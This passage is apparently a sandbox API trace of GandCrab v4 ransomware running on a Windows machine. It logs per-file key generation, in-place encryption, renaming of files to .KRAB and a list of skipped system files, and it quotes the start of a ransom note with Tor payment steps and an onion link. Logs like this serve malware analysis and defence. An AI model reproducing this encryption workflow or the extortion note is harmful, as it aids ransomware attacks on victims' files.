out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.524] GetLastError () returned 0x0 [0071.524] CryptDestroyKey (hKey=0x1023e38) returned 1 [0071.524] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.524] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0071.525] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0071.525] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0071.525] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0071.659] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.659] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0071.661] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0xa79d, lpOverlapped=0x0) returned 1 [0071.699] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffff5863, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.699] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa79d, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0xa79d, lpOverlapped=0x0) returned 1 [0071.699] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0071.699] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.707] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.710] CloseHandle (hObject=0x484) returned 1 [0071.810] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.811] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx.krab")) returned 1 [0071.812] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.812] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0071.812] lstrcmpW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2=".") returned 1 [0071.812] lstrcmpW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="..") returned 1 [0071.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001115[[fn=Parcel]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" [0071.812] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0071.813] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx.KRAB") returned 135 [0071.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0071.813] lstrlenW (lpString=".thmx") returned 5 [0071.813] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.813] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0071.813] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0071.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="desktop.ini") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="autorun.inf") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntuser.dat") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="iconcache.db") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="bootsect.bak") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="boot.ini") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntuser.dat.log") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="thumbs.db") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntldr") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="NTDETECT.COM") returned 1 [0071.814] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="Bootfont.bin") returned 1 [0071.814] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.814] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0071.815] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.815] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.816] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.816] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0071.816] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.816] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.816] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0071.816] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.817] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.817] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.817] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0071.817] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.817] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.817] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10125e0) returned 1 [0071.818] CryptImportKey (in: hProv=0x10125e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023978) returned 1 [0071.818] CryptGetKeyParam (in: hKey=0x1023978, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.818] CryptEncrypt (in: hKey=0x1023978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.818] GetLastError () returned 0x0 [0071.818] CryptDestroyKey (hKey=0x1023978) returned 1 [0071.818] CryptReleaseContext (hProv=0x10125e0, dwFlags=0x0) returned 1 [0071.818] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10121a0) returned 1 [0071.819] CryptImportKey (in: hProv=0x10121a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023db8) returned 1 [0071.819] CryptGetKeyParam (in: hKey=0x1023db8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.819] CryptEncrypt (in: hKey=0x1023db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.819] GetLastError () returned 0x0 [0071.819] CryptDestroyKey (hKey=0x1023db8) returned 1 [0071.819] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.819] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0071.911] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0071.912] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0071.912] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x9477a, lpOverlapped=0x0) returned 1 [0072.057] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff6b886, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.057] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9477a, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x9477a, lpOverlapped=0x0) returned 1 [0072.058] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.058] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.205] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.208] CloseHandle (hObject=0x484) returned 1 [0072.221] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.222] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx.krab")) returned 1 [0072.225] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.225] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0072.225] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0072.225] CloseHandle (hObject=0x470) returned 1 [0072.229] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0072.229] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0072.229] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0072.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock" [0072.229] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.229] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 125 [0072.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned 120 [0072.229] lstrlenW (lpString=".lock") returned 5 [0072.229] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.230] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0072.230] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.230] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.230] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0072.230] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0072.230] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0072.230] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt" [0072.231] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.231] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt.KRAB") returned 118 [0072.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt") returned 113 [0072.231] lstrlenW (lpString=".txt") returned 4 [0072.231] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.231] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0072.231] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt") returned 113 [0072.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\KRAB-DECRYPT.txt") returned 113 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0072.232] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0072.232] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.243] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0072.243] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0072.246] CloseHandle (hObject=0x468) returned 1 [0072.247] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0072.247] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0072.247] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0072.247] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt" [0072.247] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.247] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt.KRAB") returned 102 [0072.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt") returned 97 [0072.364] lstrlenW (lpString=".txt") returned 4 [0072.364] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.365] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0072.365] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt") returned 97 [0072.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\KRAB-DECRYPT.txt") returned 97 [0072.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0072.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.365] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0072.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0072.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0072.366] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0072.366] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.366] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0072.366] lstrcmpW (lpString1="SmartArt Graphics", lpString2=".") returned 1 [0072.366] lstrcmpW (lpString1="SmartArt Graphics", lpString2="..") returned 1 [0072.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="SmartArt Graphics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics" [0072.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\" [0072.366] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0072.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.366] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.366] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.367] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.367] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\\\KRAB-DECRYPT.txt") returned 116 [0072.367] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0072.463] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 